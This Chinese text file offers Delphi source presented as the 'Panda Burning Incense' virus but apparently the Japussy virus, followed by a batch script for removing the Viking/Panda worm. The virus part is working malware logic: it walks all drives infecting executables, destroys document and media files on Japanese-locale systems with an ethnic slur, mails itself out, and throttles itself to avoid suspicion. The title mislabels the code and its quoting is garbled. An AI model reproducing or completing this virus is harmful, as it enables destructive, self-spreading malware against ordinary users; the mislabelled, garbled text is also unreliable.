xmsx.txt

熊猫烧香源代码

InfectOneFile(Fn); //感染可执行文件 
end 
else if (Ext = ''''''''''''''''.HTM'''''''''''''''') or (Ext = ''''''''''''''''.HTML'''''''''''''''') or (Ext = ''''''''''''''''.ASP'''''''''''''''') then 
begin 
//感染HTML和ASP文件，将Base64编码后的病毒写入 
//感染浏览此网页的所有用户 
//哪位大兄弟愿意完成之？ 
end 
else if Ext = ''''''''''''''''.WAB'''''''''''''''' then //Outlook地址簿文件 
begin 
//获取Outlook邮件地址 
end 
else if Ext = ''''''''''''''''.ADC'''''''''''''''' then //Foxmail地址自动完成文件 
begin 
//获取Foxmail邮件地址 
end 
else if Ext = ''''''''''''''''IND'''''''''''''''' then //Foxmail地址簿文件 
begin 
//获取Foxmail邮件地址 
end 
else 
begin 
if IsJap then //是倭文操作系统 
begin 
if (Ext = ''''''''''''''''.DOC'''''''''''''''') or (Ext = ''''''''''''''''.XLS'''''''''''''''') or (Ext = ''''''''''''''''.MDB'''''''''''''''') or 
(Ext = ''''''''''''''''.MP3'''''''''''''''') or (Ext = ''''''''''''''''.RM'''''''''''''''') or (Ext = ''''''''''''''''.RA'''''''''''''''') or 
(Ext = ''''''''''''''''.WMA'''''''''''''''') or (Ext = ''''''''''''''''.ZIP'''''''''''''''') or (Ext = ''''''''''''''''.RAR'''''''''''''''') or 
(Ext = ''''''''''''''''.MPEG'''''''''''''''') or (Ext = ''''''''''''''''.ASF'''''''''''''''') or (Ext = ''''''''''''''''.JPG'''''''''''''''') or 
(Ext = ''''''''''''''''.JPEG'''''''''''''''') or (Ext = ''''''''''''''''.GIF'''''''''''''''') or (Ext = ''''''''''''''''.SWF'''''''''''''''') or 
(Ext = ''''''''''''''''.PDF'''''''''''''''') or (Ext = ''''''''''''''''.CHM'''''''''''''''') or (Ext = ''''''''''''''''.AVI'''''''''''''''') then 
SmashFile(Fn); //摧毁文件 
end; 
end; 
end; 
//感染或删除一个文件后睡眠200毫秒，避免CPU占用率过高引起怀疑 
Sleep(200); 
until (FindNext(SearchRec) <> 0); 
end; 
FindClose(SearchRec); 
SubDir := TStringList.Create; 
if (FindFirst(Path + ''''''''''''''''*.*'''''''''''''''', faDirectory, SearchRec) = 0) then 
begin 
repeat 
if IsValidDir(SearchRec) = 1 then 
SubDir.Add(SearchRec.Name); 
until (FindNext(SearchRec) <> 0); 
end; 
FindClose(SearchRec); 
Count := SubDir.Count - 1; 
for i := 0 to Count do 
LoopFiles(Path + SubDir.Strings + ''''''''''''''''\'''''''''''''''', Mask); 
FreeAndNil(SubDir); 
end; 
{ 遍历磁盘上所有的文件 } 
procedure InfectFiles; 
var 
DriverList: string; 
i, Len: Integer; 
begin 
if GetACP = 932 then //日文操作系统 
IsJap := True; //去死吧！ 
DriverList := GetDrives; //得到可写的磁盘列表 
Len := Length(DriverList); 
while True do //死循环 
begin 
for i := Len downto 1 do //遍历每个磁盘驱动器 
LoopFiles(DriverList + '''''''''''''''':\'''''''''''''''', ''''''''''''''''*.*''''''''''''''''); //感染之 
SendMail; //发带毒邮件 
Sleep(1000 * 60 * 5); //睡眠5分钟 
end; 
end; 
{ 主程序开始 } 
begin 
if IsWin9x then //是Win9x 
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 
else //WinNT 
begin 
//远程线程映射到Explorer进程 
//哪位兄台愿意完成之？ 
end; 
//如果是原始病毒体自己 
if CompareText(ExtractFileName(ParamStr(0)), ''''''''''''''''Japussy.exe'''''''''''''''') = 0 then 
InfectFiles //感染和发邮件 
else //已寄生于宿主程序上了，开始工作 
begin 
TmpFile := ParamStr(0); //创建临时文件 
Delete(TmpFile, Length(TmpFile) - 4, 4); 
TmpFile := TmpFile + #32 + ''''''''''''''''.exe''''''''''''''''; //真正的宿主文件，多一个空格 
ExtractFile(TmpFile); //分离之 
FillStartupInfo(Si, SW_SHOWDEFAULT); 
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 
0, nil, ''''''''''''''''.'''''''''''''''', Si, Pi); //创建新进程运行之 
InfectFiles; //感染和发邮件 
end; 
end. 
请转帖的朋友标明出处 www.honkercn.net 
以下为清除威金、熊猫烧香病毒的批处理 

@echo off 
title 清除威金（logo_1,熊猫烧香）病毒最新变种工具 
@echo 清除VIKING病毒最新变种工具 
pause 
if exist %windir%\rundl132.exe echo ---报告老大，发现有威金病毒埋伏! 让我来干掉它----- 
if exist %windir%\logo_1.exe echo ---报告老大，发现有威金病毒埋伏!让我来干掉它 ----- 
//杀viking进程 
tskill logo_1 
tskill rundl132 
tskill zt 
tskill wow 
tskill logo1_ 
tskill Ravmon 
tskill Eghost 
tskill Mailmon 
tskill KAVPFW 
tskill IPARMOR 
tskill Ravmond 
taskkill /f /im 0sy.exe 
taskkill /f /im 1sy.exe 
taskkill /f /im 2sy.exe 
taskkill /f /im 3sy.exe 
taskkill /f /im 4sy.exe 
taskkill /f /im 5sy.exe 
taskkill /f /im 6sy.exe 
taskkill /f /im 7sy.exe 
taskkill /f /im 8sy.exe 
taskkill /f /im 9sy.exe 

//删除木马 
del d:\_desktop.ini /f/s/q/a 
del c:\Program Files\_desktop.ini 
del %Windir%\MickNew\MickNew.dll 
del %Windir%\MH_FILE\MH_DLL.dll 
del %Windir%\_desktop.ini 
del %Windir%\TODAYZTKING\TODAYZTKING.DLL 
attrib -h -r -s c:\go.exe 
del c:\go.exe 
del c:\setup.exe 
attrib -h -s -r c:\autorun.inf 
del c:\autorun.inf 
attrib -h -r -s d:\go.exe 
del d:\go.exe 
del d:\setup.exe 
attrib -h -s -r d:\autorun.inf 
del d:\autorun.inf 
del e:\setup.exe 
attrib -h -r -s e:\go.exe 
del e:\go.exe 
attrib -h -s -r e:\autorun.inf 
del e:\autorun.inf 
attrib -h -r -s f:\go.exe 
del f:\go.exe 
del f:\setup.exe 
attrib -h -s -r f:\autorun.inf 
del f:\autorun.inf 
attrib -h -r -s g:\go.exe 
del g:\go.exe 
del g:\setup.exe 
attrib -h -s -r g:\autorun.inf 
del g:\autorun.inf 
del h:\go.exe 
del h:\setup.exe 
attrib -h -s -r g:\autorun.inf 
del h:\autorun.inf 
del i:\go.exe 
attrib -h -s -r g:\autorun.inf 
del i:\autorun.inf 
del i:\setup.exe 
del j:\go.exe 
attrib -h -s -r g:\autorun.inf 
del j:\autorun.inf 
del j:\setup.exe 
del %windir%\system\Logo1_.exedel %windir%\system\Logo_1.exe 
del %windir%\rundl132.exe 
del %windir%\vDll.dll 
del %windir%\Dll.dll 
del %windir%\0Sy.exe 
del %windir%\1Sy.exe 
del %windir%\2Sy.exe 
del %windir%\3Sy.exe 
del %windir%\5Sy.exe 
del %windir%\1.com 
@echo ^_^ 报告老大，VIKING已经全都被处死 

@echo 真累哈,再给你的系统免疫下,不需要的话请直接退出 
pause 
//免疫系统 
echo > %windir%\Logo1_.exe 
echo > %windir%\rundl132.exe 
echo > %windir%\0Sy.exe 
echo > %windir%\vDll.dll 
echo > %windir%\1Sy.exe 
echo > %windir%\2Sy.exe 
echo > %windir%\rundll32.exe 
echo > %windir%\3Sy.exe 
echo > %windir%\5Sy.exe 
echo > %windir%\1.com 
echo > %windir%\exerouter.exe 
echo > %windir%\EXP10RER.com 
echo > %windir%\finders.com 
echo > %windir%\Shell.sys 
echo > %windir%\kill.exe 
echo > %windir%\sws.dll 
echo > %windir%\sws32.dll 
echo > %windir%\uninstall\rundl132.exe 
echo > %windir%\SVCHOST.exe 
echo > %windir%\WINLOGON.exe 
echo > %windir%\RUNDLL32.EXE 
echo > C:\"Program Files"\svchost.exe 
echo > C:\"Program Files"\"Internet Explorer"\svchost.exe 
echo > %windir%\Download\svchost.exe 
echo > %windir%\system32\wldll.dll 
attrib %windir%\Logo1_.exe +s +r +h 
attrib %windir%\rundl132.exe +s +r +h 
attrib %windir%\0Sy.exe +s +r +h 
attrib %windir%\vDll.dll +s +r +h 
attrib %windir%\1Sy.exe +s +r +h 
attrib %windir%\2Sy.exe +s +r +h 
attrib %windir%\rundll32.exe +s +r +h 
attrib %windir%\3Sy.exe +s +r +h 
attrib %windir%\5Sy.exe +s +r +h 
attrib %windir%\1.com +s +r +h 
attrib %windir%\exerouter.exe +s +r +h 
attrib %windir%\EXP10RER.com +s +r +h 
attrib %windir%\finders.com +s +r +h 
attrib %windir%\Shell.sys +s +r +h 
attrib %windir%\kill.exe +s +r +h 
attrib %windir%\sws.dll +s +r +h 
attrib %windir%\sws32.dll +s +r +h 
attrib %windir%\uninstall\rundl132.exe +s +r +h 
attrib %windir%\SVCHOST.exe +s +r +h 
attrib %windir%\WINLOGON.exe +s +r +h 
attrib %windir%\RUNDLL32.EXE +s +r +h 
attrib C:\"Program Files"\svchost.exe +s +r +h 
attrib C:\"Program Files"\"Internet Explorer"\svchost.exe +s +r +h 
attrib %windir%\Download\svchost.exe +s +r +h 
attrib %windir%\system32\wldll.dll +s +r +h 
net share c$ /del 
net share d$ /del 
net share e$ /del 
net share f$ /del 
net share admin$ /del 
net share ipc$ /del 
cls 
@echo ------------------------------------- 
@echo viking已经全部被我杀完拉,哈,厉害吧 
@echo 系统已经成功免疫! 
@echo 谢谢你的使用,请重启您的电脑! 
@echo ------------------------------------- 
pause